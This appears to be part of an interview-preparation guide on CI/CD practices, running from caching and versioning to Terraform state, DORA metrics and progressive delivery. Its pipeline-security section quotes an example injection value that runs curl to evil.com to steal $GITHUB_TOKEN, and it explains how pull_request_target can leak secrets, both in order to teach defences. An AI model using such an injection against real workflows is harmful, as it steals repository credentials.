| Compliance (air-gapped, on-prem)? | Works | Needs self-hosted |
| Open-source projects? | Overkill | Ideal |
- “Your company uses Jenkins and wants to migrate to GitHub Actions. How do you approach it?” Don’t big-bang migrate. Start with new projects on GitHub Actions. Run both systems in parallel. Migrate existing pipelines gradually, starting with the simplest (lint/test) and ending with the most complex (production deployments). Identify Jenkins-specific features you depend on (custom plugins, dynamic pipeline generation, shared libraries) and find GitHub Actions equivalents or workarounds. Set a sunset date for Jenkins after all critical pipelines are migrated. Budget 3-6 months for a team of 50 developers.
-
“What about GitLab CI, CircleCI, or other alternatives?”
GitLab CI is excellent if you’re already on GitLab (tightest integration, included in the platform, powerful
includeandextendsfeatures). CircleCI is strong for complex pipeline orchestration (workflows, workspaces, orbs). Buildkite is great for teams that want hosted orchestration but self-hosted agents (common in security-conscious organizations). The right tool depends on your existing SCM platform, security requirements, and pipeline complexity. - “Can you use both Jenkins and GitHub Actions in the same organization?” Yes, and it’s common during migrations. Use GitHub Actions for PR checks (lint, test, security scan) and Jenkins for complex deployment pipelines. Trigger Jenkins from GitHub Actions via webhook. This gives you GitHub’s PR integration with Jenkins’s deployment flexibility. Long-term, you want to consolidate to reduce maintenance overhead, but this hybrid approach works during transitions.
43. Build Caching
43. Build Caching
-
Dependency caching: Cache
node_modules/,.m2/repository,~/.cache/pip,vendor/. Avoids re-downloading packages on every build. Cache key: hash of the lockfile (hashFiles('package-lock.json')). When the lockfile changes, the cache is invalidated. GitHub Actions:actions/cache, built-in forsetup-nodewithcache: 'npm'. Savings: 30 seconds to 5 minutes per build. -
Docker layer caching: Docker builds layers incrementally. If a layer’s inputs haven’t changed, reuse the cached layer.
COPY package.json . && RUN npm installis cached untilpackage.jsonchanges. Layer ordering matters: put frequently-changing instructions (COPY source code) after rarely-changing instructions (install dependencies). For CI: use BuildKit inline cache (--cache-from), registry-based cache (--cache-to type=registry), or GitHub Actions cache backend. -
Build output caching: Cache compiled outputs. Go’s build cache (
~/.cache/go-build), Gradle’s build cache (.gradle/caches), Webpack’s persistent cache. Savings: minutes for large compilations. -
Test result caching: Some tools cache test results and skip re-running tests whose inputs haven’t changed. Nx, Turborepo, Bazel all support this.
nx affected --target=testonly runs tests for changed projects. - Remote caching: Share caches across developers and CI runners. Turborepo Remote Cache, Nx Cloud, Gradle Build Cache (remote). Developer A builds locally; Developer B and CI reuse A’s cache. This is the biggest win for monorepos — avoid rebuilding unchanged packages across the entire team.
CACHE_VERSION variable in the workflow).Red flag answer: “We cache everything.” Without mentioning cache invalidation strategy, correctness concerns, or key design. A bad cache key means builds use stale dependencies and produce subtle bugs that are hellish to debug.Follow-up:-
“Your cache hit rate is 40%. How do you improve it?”
Analyze cache misses: are the keys too specific (changing on every build)? Is the cache being evicted due to size limits? GitHub Actions has a 10GB cache limit per repo — large
node_modulescaches fill this quickly. Solutions: use more stable cache keys (hash of lockfile, not of all source files), use a restore key that falls back to a partial match, increase cache storage (self-hosted caching with S3), compress caches before storing. -
“How do you handle cache poisoning in CI?”
A malicious PR could modify cached content (e.g., inject code into cached
node_modules). Mitigations: use content-addressed caching (the cache key includes the hash of inputs, so modified content gets a different key), isolate PR caches from main branch caches (GitHub Actions does this by default — PR caches can read from main but can’t write to main), and clear caches periodically. For self-hosted caching, ensure the cache storage has integrity verification. -
“Docker layer caching doesn’t work in CI. What’s wrong?”
Common causes: (1) the CI runner is ephemeral and the local Docker cache is empty. Solution: use
--cache-fromto pull cached layers from the registry. (2) Build arguments or secrets change between builds, invalidating layers early. Solution: put argument-dependent instructions late in the Dockerfile. (3) ACOPY . .instruction early in the Dockerfile invalidates everything when any source file changes. Solution: copy dependency manifests first, install dependencies, then copy source code. (4) Usingdocker buildinstead of BuildKit. Solution:DOCKER_BUILDKIT=1 docker buildordocker buildx build.
44. Semantic Versioning
44. Semantic Versioning
MAJOR.MINOR.PATCH format to communicate the nature of changes:- MAJOR (1.0.0 -> 2.0.0): Breaking changes. The API contract changed in a way that existing consumers will break. Removing a field, changing a return type, renaming an endpoint. Consumers must update their code.
- MINOR (1.0.0 -> 1.1.0): New functionality, backward-compatible. New endpoints, new optional fields, new features. Existing consumers continue to work without changes.
- PATCH (1.0.0 -> 1.0.1): Bug fixes, backward-compatible. No new features. Security patches. Performance improvements.
1.0.0-alpha.1,1.0.0-beta.3,1.0.0-rc.1: Pre-release versions. Sort order:alpha < beta < rc < release.1.0.0+build.123: Build metadata (ignored in version precedence).
- “We’re on 0.x.y so breaking changes are fine.” Technically yes (SemVer says
0.x.yis for initial development), but if you have external consumers, treat0.MAJOR.MINORasMAJOR.MINOR.PATCHin practice. Breaking changes on every minor version frustrates users. - “We bump major on every release.” This isn’t SemVer. If every release is a major version, the version number carries no information about compatibility.
- “We auto-increment patch on every build.” This conflates build numbers with version numbers. Version numbers have semantic meaning; build numbers don’t.
feat: -> bump minor, fix: -> bump patch, feat!: or BREAKING CHANGE: -> bump major). Tools: semantic-release, release-please, standard-version. CI reads commit messages since the last release and automatically determines the next version, creates a tag, generates a changelog, and publishes the release. This removes human judgment (and error) from versioning.Red flag answer: “We just increment the version when we feel like it.” Versioning without a consistent strategy confuses consumers and makes dependency management unpredictable.Follow-up:-
“How does SemVer work for services (not libraries)?”
SemVer was designed for libraries with explicit API contracts. For services, it’s less clear — who is the “consumer”? Some teams use SemVer for the API version (external-facing) and date-based versioning (
2024.01.15) or git SHAs for the deployment version (internal). The key: the API version communicates compatibility to consumers, the deployment version identifies the specific build for debugging. -
“How do you handle a breaking change that you want to introduce gradually?”
Use API versioning (
/v1/users,/v2/users). Introduce v2 with the breaking change while keeping v1 working. Communicate a deprecation timeline (v1 will be removed in 6 months). Monitor v1 usage. Send deprecation warnings in v1 responses (Deprecation: trueheader). Remove v1 when usage drops to zero (or acceptable level). Never surprise consumers with breaking changes. -
“What’s CalVer and when would you use it over SemVer?”
Calendar Versioning uses date-based versions (
2024.01,24.1.0). Good for: projects that release on a fixed schedule (Ubuntu 24.04), projects where “backward compatibility” isn’t meaningful (OS distributions, infrastructure tools), or projects where the date is more useful than the change type. Python uses CalVer for yearly releases. Docker uses CalVer (24.0). For libraries consumed by other code, SemVer is better because it communicates compatibility.
45. Changelog Generation
45. Changelog Generation
- Types:
feat(new feature),fix(bug fix),docs(documentation),style(formatting),refactor,perf(performance),test,chore(maintenance),ci(CI changes). - Breaking changes: Add
!after the type (feat!: remove legacy endpoint) or addBREAKING CHANGE:in the footer. - Scope: Optional context (
feat(auth): add SSO support,fix(payments): correct rounding error).
- Developers write Conventional Commits.
- CI lints commit messages (commitlint with Husky pre-commit hook). Rejects
"fixed stuff"and"WIP". - On merge to main, a release tool (semantic-release, release-please) reads commit messages since the last release.
- Determines the version bump: any
feat= minor, anyfixonly = patch, anyBREAKING CHANGE= major. - Generates changelog: groups changes by type, links to PRs/issues.
- Creates a Git tag and GitHub Release with the changelog.
- Publishes the package (npm, PyPI, Docker).
-
“How do you enforce Conventional Commits across a team?”
Use commitlint with a pre-commit hook (Husky for JS, pre-commit for Python). The hook checks that every commit message matches the Conventional Commits format before allowing the commit. For squash-merge workflows, lint the PR title instead (GitHub Actions can run commitlint against the PR title). Provide a
git cz(Commitizen) CLI that walks developers through writing a properly formatted commit message interactively. Start with education: show the team the generated changelog and explain how their commit messages become user-facing release notes. - “What’s the difference between semantic-release and release-please?” semantic-release: fully automated, runs on every merge to main, creates releases immediately. Best for libraries and packages that should be released continuously. release-please: creates a “release PR” that accumulates changes. A human merges the release PR to trigger the actual release. Best for applications where you want to batch changes and control release timing. Both read Conventional Commits, both generate changelogs, both create Git tags.
-
“How do you handle commits that don’t fit Conventional Commits?”
Use
chore:as a catch-all for maintenance tasks that don’t appear in the changelog. Most changelog generators excludechore,docs,style,test, andcitypes from the user-facing changelog (they’re still in Git history). For “misc” changes, the team should ask: “Is this a feature, a fix, or maintenance?” One of those three always applies. If developers resist Conventional Commits, the problem is usually friction — provide tooling (Commitizen, IDE templates) that makes it as easy as free-form messages.
46. Why did the pipeline fail?
46. Why did the pipeline fail?
ENOSPC— disk full. Runner ran out of disk space (Docker images, build artifacts).OOMKilled— out of memory. The build or test consumed more memory than the runner has.ETIMEOUT/Connection refused— network issue. Can’t reach a registry, database, or external service.Permission denied— IAM role missing, file permissions wrong, Docker socket not accessible.Exit code 1in a test step — a test failed (not an infra issue, a code issue).
- Code failure: A test failed, a build error, a type error. The fix is in the code.
git diffbetween the last green run and this one to see what changed. - Environment failure: The runner is different, an env var is missing, a dependency is unavailable. Compare the failing run’s environment with a successful one.
- Infrastructure failure: Registry is down, runner can’t start, network partition. Check status pages, infrastructure dashboards.
- Flakiness: The same code passed on the previous run. Check flake history for this test. Re-run to confirm. If it passes on retry, it’s flaky (fix the root cause, don’t just retry forever).
docker run the same image with the same commands. If it works locally but fails in CI, the difference is the environment: OS version, installed tools, network access, environment variables, runner resource limits.Step 4: Check recent changes.
What changed since the last green build? git log --oneline HEAD~5..HEAD. Was a dependency updated? Did the pipeline YAML change? Did an infrastructure change happen (Terraform apply, Kubernetes upgrade)?Step 5: Check for external factors.
Is an external service down (GitHub, Docker Hub, npm registry)? Is it a rate limit? Is it a certificate expiration? Check provider status pages.Red flag answer: “I just re-run the pipeline and it usually works.” This masks real issues. If re-running works, it’s a flaky test or an intermittent infrastructure issue — both need root cause analysis.Follow-up:-
“The pipeline has been failing intermittently for 3 days. No one can reproduce it locally. How do you investigate?”
Correlate: when does it fail? Time of day? Specific runners? Specific test files? Run the test suite with verbose logging on CI. If it’s a specific test, instrument it with additional debug output. Check if the runner’s resource usage hits limits during the failure window (CPU throttling, memory pressure). Check if the failure correlates with other team’s pipelines running concurrently (shared resource contention). Enable
set -xin shell steps to see exactly what commands execute. If it’s a network issue, add connectivity checks before the failing step. -
“A pipeline that takes 20 minutes suddenly takes 90 minutes. No code changes. What happened?”
Check: (1) Is caching broken? A cache miss forces full dependency download and rebuild. Check cache hit/miss logs. (2) Did a dependency update happen?
npm installmight be resolving a newer, slower version. Check lockfile changes. (3) Is the runner slower? Cloud providers sometimes move you to older hardware. Check runner specs. (4) Is a downstream service slow? Integration tests hitting a degraded database. Check downstream latency. (5) Did test parallelism change? If matrix builds reduced or sharding changed, tests run sequentially instead of in parallel. - “How do you prevent pipeline failures from blocking the entire team?” Separate concerns: run fast, high-confidence checks (lint, build, unit tests) as required status checks on PRs. Run slow, lower-confidence checks (E2E, performance, security scans) as non-blocking or post-merge. Use merge queues (GitHub Merge Queue) to prevent broken code from reaching main. If main is broken, prioritize the fix as a P0 — a broken main blocks everyone. Some teams have a “build cop” rotation where one engineer monitors and fixes pipeline failures for the week.
47. Terraform State in CI
47. Terraform State in CI
.tf configuration and the real-world resources. It contains resource IDs, IP addresses, and often sensitive data (database passwords, API keys). Managing state correctly is critical for safe infrastructure automation.Why state must be remote (never in Git):- State contains sensitive information (even with Terraform’s attempts to mark things sensitive, connection strings, passwords, and IPs leak into state).
- Multiple engineers running
terraform applywith local state creates conflicts and resource drift. - CI pipelines need a shared, consistent view of state.
- S3 + DynamoDB (AWS): State stored in an S3 bucket (encrypted, versioned), locking via DynamoDB table. This prevents two
terraform applycommands from running concurrently and corrupting state. - GCS + locking (GCP): Google Cloud Storage with built-in locking.
- Terraform Cloud/Enterprise: Hosted state management with built-in locking, encryption, RBAC, and audit logs.
- Azure Blob Storage: With state locking via blob lease.
- PR pipeline:
terraform init->terraform plan-> Post plan output as a PR comment. Reviewers see exactly what will change (“3 resources to add, 1 to modify, 0 to destroy”). - Merge to main:
terraform apply -auto-approve(with the plan from step 1 as input,terraform apply tfplan). This ensures the applied plan is exactly what was reviewed. - Locking: DynamoDB lock prevents concurrent applies. If two merges happen simultaneously, the second waits for the first’s lock to release.
- State bucket: encrypted at rest, versioned (rollback on state corruption), access restricted to CI role only. No human access.
- State locking: prevents concurrent modifications. Without locking, two applies can create orphaned resources or partial infrastructure.
- Sensitive outputs: use
sensitive = trueand ensure CI logs don’t print plan output with sensitive values in plain text.
-
“Terraform state becomes corrupted or out of sync. How do you recover?”
S3 versioning lets you restore a previous state version.
terraform state pulldownloads current state for inspection.terraform state rmremoves a resource from state without destroying it (useful if a resource was manually deleted).terraform importbrings manually-created resources into state. For severe corruption, restore from the last known-good S3 version and runterraform planto identify drift. Never edit state files manually unless you truly understand the format. -
“How do you handle state for multiple environments (dev, staging, prod)?”
Separate state files per environment. Options: (1) Terraform workspaces (
terraform workspace select prod) — simple but all environments share the same backend configuration. (2) Separate backend configurations per environment (-backend-configflag or separate.tfvarsfiles). (3) Directory-based separation (envs/dev/,envs/staging/,envs/prod/each with their own state). Option 3 is most common because it provides the clearest separation and makes it impossible to accidentally apply dev configuration to prod. -
“How do you prevent a developer from running
terraform destroyin production from the CI pipeline?” Use IAM role restrictions: the CI role for prod cannot callec2:TerminateInstancesorrds:DeleteDBInstance. Use Sentinel/OPA policies that reject plans withdestroyactions for production workspaces. Require manual approval (environment protection rules in GitHub Actions) before any production Terraform apply. Useprevent_destroylifecycle rules on critical resources in the Terraform config itself. Log everyterraform applywith the plan output to an audit trail.
48. Handling Database Migrations
48. Handling Database Migrations
- Migration scripts are version-controlled alongside application code.
- Migrations run as a pre-deployment step — before the new application version starts. In Kubernetes, this is typically a Job or init container. In ArgoCD, a
PreSynchook. In Helm, a pre-upgrade hook. - The migration tool tracks which migrations have been applied (a
schema_migrationstable in the database). It only runs new, unapplied migrations.
- Safe operations: Adding a column with a default, adding a table, adding an index (concurrently in Postgres), adding a nullable column.
- Unsafe operations: Dropping a column (old code references it), renaming a column (old code references old name), changing a column type (old code expects old type), adding a NOT NULL column without a default (old rows violate the constraint).
- Expand: Add the new column/table. Deploy code that writes to both old and new columns. No old columns removed.
- Migrate data: Backfill the new column from old data. Run as a background job, not blocking the deploy.
- Contract: After all code is on the new version and the old column is unused, remove it in a subsequent deploy.
-
“You need to rename a column from
usernametodisplay_namewith zero downtime. Walk me through it.” Deploy 1: Adddisplay_namecolumn. Write to bothusernameanddisplay_name. Read fromusername. Backfilldisplay_namefromusernamefor existing rows. Deploy 2: Switch reads todisplay_name. Still write to both. Deploy 3: Stop writing tousername. Removeusernamecolumn. Each deploy is independently safe because the schema is compatible with both the old and new code at every step. -
“A migration takes 30 minutes on the production database (100M rows). How do you handle it?”
Never run a 30-minute migration in a blocking deploy step. Use a non-blocking approach: run the migration as a background job (pt-online-schema-change for MySQL,
pg_repackorCREATE INDEX CONCURRENTLYfor Postgres). These tools copy data in batches while the table remains available. For large data backfills, process in chunks of 10K-100K rows with a sleep between batches to avoid overwhelming the database. Track progress with a counter. Some teams run large migrations outside the CI/CD pipeline entirely — as a scheduled, monitored operation managed by the DBA team. -
“How do you test migrations before running them in production?”
Run migrations against a clone of the production database (restored from a recent backup or snapshot). Measure: execution time, lock duration, error rate. Some teams maintain a “staging migration database” that’s a recent copy of production (anonymized). Run the migration against it as part of the staging deploy. If it takes 30 minutes on staging, you know it’ll take ~30 minutes on production. For critical migrations, also run an
EXPLAINon the generated SQL to verify it uses efficient execution plans.
49. ChatOps
49. ChatOps
- A team member types
/deploy myapp v2.3.0 to productionin Slack/Teams. - A bot (Hubot, Slack bot, custom webhook) receives the command.
- The bot triggers the deployment pipeline (GitHub Actions workflow dispatch, Jenkins API call, ArgoCD sync).
- The bot posts real-time status updates: “Deploying… Smoke tests running… Deploy complete. 0 errors in the last 5 minutes.”
- The entire team sees the deployment happen in real-time.
- Visibility: Everyone sees who deployed what, when. No more “who deployed to prod at 3 AM?” — it’s in the chat log.
- Auditability: Chat history serves as an audit trail. Compliance teams can review deployment decisions.
- Collaboration: During an incident, the team coordinates in the chat room. “I’m rolling back v2.3.0.” “OK, I’ll monitor error rates.” All context is in one place.
- Onboarding: New engineers learn deployment procedures by watching the chat room. They see the commands, the workflow, and the responses.
- Democratization: Deploying to production shouldn’t require SSH access or CI dashboard access. A chat command is accessible to anyone with the right permissions.
/incident create "Payment processing degraded"— creates an incident channel, pages on-call./status myapp— shows current version, health, last deploy time./rollback myapp— triggers a rollback with one command./lock prod "maintenance window"— prevents deployments during a maintenance window./graph cpu myapp 1h— renders a Grafana graph in chat.
-
“How do you secure ChatOps to prevent unauthorized deployments?”
Role-based access: only members of the
#deploymentschannel or a specific Slack user group can trigger production deploys. The bot verifies the user’s identity against an ACL before executing. Require multi-factor: “To deploy to production, type/deploy-confirmwithin 60 seconds” (prevents accidental deploys). Log every command and its result. Rate limit: max 1 production deploy per hour (prevent rapid-fire deploys during panic). -
“How does ChatOps interact with GitOps?”
ChatOps triggers a Git commit (the chat command creates a PR or pushes a change to the GitOps repo). ArgoCD detects the change and applies it. The chat room shows the ArgoCD sync status. This preserves the GitOps principle (Git is the source of truth) while providing the ChatOps UX (chat is the command interface). The bot doesn’t
kubectl applydirectly — it modifies Git, and GitOps handles the rest. - “What are the failure modes of ChatOps?” (1) Bot goes down — deployments are blocked if the bot is the only way to deploy. Always have a fallback (direct CI trigger). (2) Chat platform outage (Slack goes down) — can’t deploy. Run the bot on a fallback channel or have a CLI alternative. (3) Security: if the bot’s Slack token is compromised, anyone with the token can trigger deploys. Rotate tokens, use short-lived credentials, and monitor for unusual bot activity.
50. DORA Metrics
50. DORA Metrics
-
Deployment Frequency (DF): How often does the team deploy to production?
- Elite: Multiple times per day. High: Weekly to monthly. Low: Monthly to every 6 months.
- Measures: CI/CD pipeline efficiency, team confidence, batch size.
- How to improve: Smaller batches, trunk-based development, automated deployments, feature flags.
-
Lead Time for Changes (LT): Time from code commit to running in production.
- Elite: < 1 hour. High: 1 day to 1 week. Low: 1 month to 6 months.
- Measures: Pipeline speed, review process efficiency, deployment automation.
- How to improve: Faster CI pipelines, smaller PRs, automated testing, parallel stages, reduce manual approvals.
- Breakdown: Coding time + PR review time + CI time + Deploy time. Measure each segment to find the bottleneck. Often, PR review wait time dominates.
-
Change Failure Rate (CFR): What percentage of deployments cause a failure in production (requiring rollback, hotfix, or incident)?
- Elite: 0-15%. High: 16-30%. Low: > 60%.
- Measures: Test quality, code review effectiveness, deployment safety mechanisms.
- How to improve: Better test coverage, canary deployments, feature flags, automated rollback, pre-production environments that mirror production.
-
Mean Time to Restore Service (MTTR): How long from a production incident to full resolution?
- Elite: < 1 hour. High: 1 day. Low: 1 week to 1 month.
- Measures: Observability, incident response process, rollback capability.
- How to improve: Better monitoring/alerting, runbooks, automated rollback, reduced blast radius (canary), incident response drills.
- Deployment Frequency: Count deployments per day/week (CI/CD tool API, deployment events).
- Lead Time: Git commit timestamp to production deploy timestamp (requires tagging deploys with the commit SHA).
- Change Failure Rate: Count incidents/rollbacks divided by total deployments (incident management tool + deployment tool).
- MTTR: Incident creation time to resolution time (PagerDuty, Opsgenie, incident management tool).
- Tools: Sleuth, LinearB, Haystack, Jellyfish, or custom dashboards with data from GitHub API + deployment tool + incident tool.
- “Your team’s lead time is 2 weeks. Where do you start investigating?” Break it down: Code to PR (how long does coding take?), PR to merge (how long do reviews take?), merge to deploy (how long does the pipeline take?). Usually, PR review wait time is the bottleneck — PRs sit for days waiting for reviews. Solutions: smaller PRs (easier to review quickly), review SLAs (review within 4 hours), pair programming (no async review needed), automated checks that reduce reviewer burden. A PR that takes 5 days to review and 10 minutes to deploy still has a 5-day lead time.
- “Is it possible to have high deployment frequency but also high change failure rate?” Yes, and it indicates a testing or quality problem. The team is deploying fast but deploying broken code. Root causes: insufficient test coverage, no pre-production validation, no canary analysis, pressure to ship without adequate review. The fix is not to slow down deployment frequency — it’s to improve the quality gates. Add automated testing, canary deployments, and post-deploy smoke tests. The goal is to increase frequency AND decrease failure rate simultaneously.
- “How do you prevent DORA metrics from being gamed?” Deployment frequency can be gamed by deploying no-ops. Lead time can be gamed by merging untested code quickly. CFR can be gamed by not tracking incidents. MTTR can be gamed by prematurely closing incidents. Mitigation: use metrics for team improvement, never for individual performance reviews. Review metrics alongside qualitative signals (is the team actually delivering value? are customers happy?). Focus on trends over time, not absolute numbers. Create a culture where metrics expose problems to fix, not blame to assign.
6. Advanced Topics
51. Pipeline Security: Injection Attacks
51. Pipeline Security: Injection Attacks
"; curl http://evil.com/steal?token=$GITHUB_TOKEN; echo ". The shell executes:- Never interpolate
${{ }}expressions directly intorun:blocks. Instead, pass them as environment variables:
- Use
actions/github-scriptfor complex logic instead of shell interpolation. - Audit all workflows for
${{ }}insiderun:blocks. Tools: actionlint, zizmor. - Restrict
pull_request_targettrigger (it runs with base branch secrets but can access PR code).
- Jenkinsfile: Groovy string interpolation with untrusted input.
- Docker build args:
ARG BRANCH=$BRANCH_NAME— a malicious branch name could inject commands. - Makefile targets called from CI with unsanitized variables.
-
“How do you audit existing workflows for injection vulnerabilities?”
Run
actionlint(static analysis for GitHub Actions). Search for the pattern${{ github.eventinsiderun:blocks. StepSecurity’sharden-runneraction detects outbound network calls from workflows (catches exfiltration). For a thorough audit, treat every${{ }}expression in arun:block as a potential vulnerability and evaluate whether the source is trusted. PR titles, commit messages, issue bodies, and branch names are all attacker-controlled. -
“How does
pull_request_targetcreate a security risk?”pull_requestruns the workflow from the PR’s head branch with read-only access and no secrets.pull_request_targetruns the workflow from the base branch (main) with full secrets and write access. If the workflow from main checks out the PR’s code (actions/checkout ref: ${{ github.event.pull_request.head.sha }}) and runs it, the PR’s code now executes with main’s secrets. This is how external contributors can steal repository secrets. -
“What other supply chain risks exist in GitHub Actions beyond injection?”
Typosquatting on actions (using
action/checkoutinstead ofactions/checkout). Compromised action tags (thev3tag is moved to a malicious commit — pin to SHA instead). Excessive permissions onGITHUB_TOKEN(default is read/write, should be scoped to minimum needed withpermissions:block). Workflow artifacts containing secrets. Self-hosted runners that accumulate state between jobs (a previous job’s credentials are accessible to the next job).
52. Progressive Delivery
52. Progressive Delivery
- CI/CD: Automates build, test, deploy. The artifact reaches production automatically.
- Progressive Delivery: Controls who sees the change and when, with automated safety checks at each stage.
- Traffic shifting: Route 1% -> 5% -> 25% -> 100% of traffic to the new version. Implemented via service mesh (Istio), ingress controller (NGINX), or application-level routing.
- Automated analysis: At each stage, compare canary metrics against baseline using statistical tests. Tools: Kayenta (Spinnaker), Argo Rollouts AnalysisRuns, Flagger.
- Automated rollback: If analysis fails at any stage, automatically route 100% of traffic back to the stable version. No human intervention needed.
- Feature flags: Control feature visibility independently of deployment. Gradually enable features for specific user segments.
- “How do you handle progressive delivery for backend services that don’t directly serve user traffic?” Measure internal metrics: queue processing latency, error rates in downstream services, database query performance. Use custom analysis templates that query Prometheus/Datadog for service-specific metrics. For event-driven services, compare event processing throughput and error rates between canary and baseline consumer groups.
- “What metrics would you use for an automated analysis template?” Golden signals: error rate (5xx), latency (p99), saturation (CPU > 80%). Business metrics: conversion rate, API success rate, revenue per request. Infrastructure: pod restart count, memory growth rate. The analysis template compares canary metrics against baseline (the same service running the old version during the same time window) using statistical significance tests.
-
“How does progressive delivery interact with database migrations?”
The database migration must complete successfully before any traffic is shifted to the new version. Use an Argo Rollouts
PrePromotionAnalysisor a pre-sync hook to run migrations. If the migration fails, the rollout doesn’t proceed. If the migration succeeds but the new code has issues, the code can rollback while the database keeps the expanded schema (expand-contract pattern). This is why backward-compatible migrations are essential for progressive delivery.
53. Observability-Driven Deployment
53. Observability-Driven Deployment
- Metrics: Error rates, latency percentiles, throughput, CPU/memory. Used for automated canary analysis. “If p99 latency increases > 20% compared to baseline, rollback.”
- Logs: Structured log analysis during deployment. Watch for new error patterns, increased error volume, or specific error codes. “If ERROR log count increases 3x during canary, pause promotion.”
- Traces: Distributed tracing reveals where latency is introduced. “The new version adds 50ms to the database span in the checkout flow.” Useful for diagnosing why metrics changed, not just that they changed.
- Deploy markers: Annotate Grafana dashboards and Datadog dashboards with deployment events. This correlates metrics changes with specific deploys. “Latency spiked at 14:32 — oh, that’s when v2.3.0 deployed.”
- Automated anomaly detection: Tools like Datadog, New Relic, and Dynatrace can detect metric anomalies in real-time. Integrate with the deployment pipeline: if an anomaly is detected within 15 minutes of deployment, auto-pause or rollback.
- SLO-based deployment gates: Define Service Level Objectives (99.9% availability, p99 < 200ms). If a deployment would violate the SLO (error budget consumed), block it. Google’s SRE practices use error budget policies to gate deployments.
- Synthetic monitoring post-deploy: Datadog Synthetics, New Relic Synthetics run scripted user journeys every minute from multiple global locations. If synthetic checks fail after deployment, alert and rollback.
- “How do you set thresholds for automated rollback without being too sensitive or too lenient?” Start with relative thresholds (canary vs baseline), not absolute thresholds. “If canary error rate is 2x baseline” is better than “if error rate exceeds 1%” because baseline already accounts for normal variance. Use statistical tests rather than simple threshold checks to reduce false positives. Tune over time: start lenient (avoid false rollbacks), tighten as you gain confidence. Track how many automated rollbacks were justified vs false positives.
- “How do you distinguish deployment-caused issues from unrelated production issues?” Correlation, not causation. Did the metric change coincide with a deployment? Did it affect only the canary pods or all pods? Is the issue in the changed service or a dependent service? Use deployment markers on dashboards. If the baseline (old version) also shows degradation, the issue is external (not deployment-caused). If only the canary shows degradation, it’s likely deployment-caused.
- “What’s an error budget and how does it relate to deployments?” If your SLO is 99.9% availability (43 minutes of downtime per month), your error budget is 0.1% (43 minutes). If a deployment consumes 20 minutes of error budget, you have 23 minutes left. If the error budget is exhausted, freeze deployments (except reliability improvements) until the budget recovers. This creates a natural brake: deploy fast when things are stable, slow down when stability is low. Google SRE teams enforce this formally.
54. Multi-Cloud and Hybrid CI/CD
54. Multi-Cloud and Hybrid CI/CD
- Different APIs and tools: Each cloud has its own deployment mechanisms (EKS vs GKE vs AKS, S3 vs GCS vs Azure Blob). The pipeline needs cloud-specific steps.
- Credential management: Separate IAM/service account credentials per cloud. OIDC federation needs separate configuration for each cloud provider.
- Networking: Deploying to on-prem requires network connectivity from CI runners to internal infrastructure. VPN, Direct Connect, or self-hosted runners inside the corporate network.
- Testing: “Works on AWS” doesn’t mean “works on GCP.” Cloud-specific behaviors (IAM policies, network configurations, managed service quirks) need cloud-specific testing.
- Abstraction layer: Use Kubernetes as the common deployment target. Build Docker images once, deploy to EKS, GKE, and AKS with the same Helm charts. Differences are in the infrastructure layer (managed by Terraform per cloud), not the application layer.
- Terraform modules per cloud: Shared module interface with cloud-specific implementations.
modules/database/aws/,modules/database/gcp/. Same variables, different resources. - Pipeline templates: Shared CI logic for build/test, cloud-specific steps for deploy. GitHub Actions reusable workflows with cloud-specific deployment jobs.
- GitOps per cluster: ArgoCD running in each cluster, all pointing to the same Git repo. A commit deploys to all clusters simultaneously (or sequentially with promotion).
- “How do you handle a deploy that succeeds in AWS but fails in GCP?” Each cloud deployment should be independent and capable of rollback independently. Use circuit breakers: if GCP deploy fails, don’t rollback AWS (it’s working fine). Investigate the GCP-specific failure (usually IAM, networking, or managed service configuration differences). Maintain cloud-specific integration tests that run against each provider’s environment.
- “How do you manage Terraform state across multiple clouds?” Separate state per cloud provider and per environment. AWS state in S3, GCP state in GCS (or a single backend for simplicity — both can be in S3). Each cloud has its own Terraform configuration, providers, and state. Use Terragrunt for DRY configuration across environments and clouds. Never share state between clouds — a failed AWS apply should not block GCP.
- “What’s the argument for and against multi-cloud?” For: avoid vendor lock-in, negotiate better pricing, regulatory requirements (data must be in specific regions), disaster recovery (cloud provider outage). Against: increased complexity (2x the tooling, 2x the expertise, 2x the maintenance), lowest-common-denominator design (can’t use cloud-specific best features), higher cost (managing 2 clouds is more expensive than optimizing 1). Most companies are better off going deep on one cloud and using multi-region within that cloud for resilience.
55. Trunk-Based Development vs GitFlow in CI/CD
55. Trunk-Based Development vs GitFlow in CI/CD
- All developers commit to
main(trunk) directly or via very short-lived feature branches (< 1-2 days). mainis always in a deployable state.- Feature flags hide incomplete work from users.
- CI runs on every commit to main. CD deploys from main.
- Who uses it: Google (all 25,000+ engineers commit to a single trunk), Facebook, Netflix, most high-performing teams.
- Prerequisite: Strong test suite, feature flags, automated deployments, team discipline.
- Long-lived
developbranch for integration. Feature branches merge todevelop. Release branches cut fromdevelop. Hotfix branches frommain. - CI runs on
develop. CD deploys from release branches after stabilization. - Who uses it: Teams with scheduled releases (every 2 weeks), packaged software, mobile apps (App Store review cycle forces batched releases).
- Problem with CI/CD: Feature branches live for days/weeks. Integration only happens at merge time. “Integration hell” returns. CI on feature branches tests in isolation, not integration. The
developbranch is often broken because merging 3 feature branches simultaneously introduces conflicts.
| Factor | Trunk-Based | GitFlow |
|---|---|---|
| Integration frequency | Every commit | Every merge to develop |
| Deployment frequency | Multiple/day | Every sprint |
| Merge conflicts | Rare (small changes) | Common (large merges) |
| Feature flags needed? | Yes | No (branches isolate) |
| Rollback | Deploy previous commit | Complex branch management |
-
“How do you handle half-finished features on trunk?”
Feature flags. The code is on trunk but hidden behind
if (featureFlags.isEnabled('new-checkout')). The flag isofffor all users until the feature is complete. This allows: continuous integration (code is merged early and often), deployment at any time (the flag is off), gradual rollout (enable for internal users, then 5% of users, then everyone), and instant “rollback” (toggle the flag off). The trade-off: feature flag tech debt. You must clean up flags after features launch. - “A team of 50 developers all committing to trunk. How do you prevent chaos?” Strong CI is the gatekeeper. Every PR runs comprehensive tests in under 10 minutes. Merge queues (GitHub Merge Queue, Bors) serialize merges and verify each one against trunk before merging. If PR A and PR B both pass individually but conflict with each other, the merge queue catches it. Codeowners enforce review from domain experts. Small PRs (under 200 lines) are expected and enforced by policy. Google runs this at 25,000+ engineers scale using their Submit Queue.
- “When would you recommend GitFlow over trunk-based development?” When you need to maintain multiple versions simultaneously (v1.0 receives patches while v2.0 is in development). When your release cycle is externally constrained (App Store review, hardware release cycles, regulatory approval). When the team lacks the test coverage and feature flag infrastructure needed for trunk-based development. But I’d always advocate for moving toward trunk-based as the team matures — the benefits for CI/CD effectiveness are substantial.
56. Disaster Recovery for CI/CD Infrastructure
56. Disaster Recovery for CI/CD Infrastructure
- CI platform: GitHub Actions outage, Jenkins controller crash, GitLab.com incident.
